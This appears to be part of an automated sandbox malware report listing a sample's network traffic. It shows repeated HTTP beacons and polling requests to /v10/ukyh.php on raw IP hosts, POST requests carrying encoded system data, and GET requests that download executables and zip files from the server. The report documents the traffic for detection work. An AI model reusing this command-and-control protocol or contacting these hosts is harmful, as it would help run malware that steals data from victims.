58 47 6c 75 5a 47 64 75 63 56 35 44 63 6e 4a 47 59 58 5a 70 56 46 42 74 59 57 39 70 62 6d 64 63 52 47 39 75 65 47 70 70 62 6b 52 33 62 33 42 7a 58 6a 52 44 51 54 73 32 50 6a 4d 7a 4e 30 4e 44 51 54 63 79 52 44 5a 43 52 30 51 79 52 6b 55 7a 4d 44 70 48 52 45 55 38 4e 43 78 34 62 6d 56 5a 51 6c 38 7a 4d 6a 41 6f 4f 54 67 79 4d 7a 45 6f 4d 54 63 34 4c 6a 49 78 4e 79 59 77 4d 6a 51 75 4e 54 5a 62 51 46 38 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkyMipLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXkZvbHJoaW5GdWVwcV40Q0M5NDQxMTdBQUM3MEQ8QEVGOERHOzIwR0ZHNjRfZG4mNXhbQl0xMDAqMTI4MzEqMTU6LjIzNS4yMDQmNzZZQF0zMjAoMzAwKEE6XFVxbXBzXGluZGducV5DcnJGYXZpVFBtYW9pbmdcRG9ueGppbkR3b3BzXjRDQTs2PjMzN0NDQTcyRDZCR0QyRkUzMDpHREU8NCx4bmVZQl8zMjAoOTgyMzEoMTc4LjIxNyYwMjQuNTZbQF8%3D
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 111Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 111Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: global traffic HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 111Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=5 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=31 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=7 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=8 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
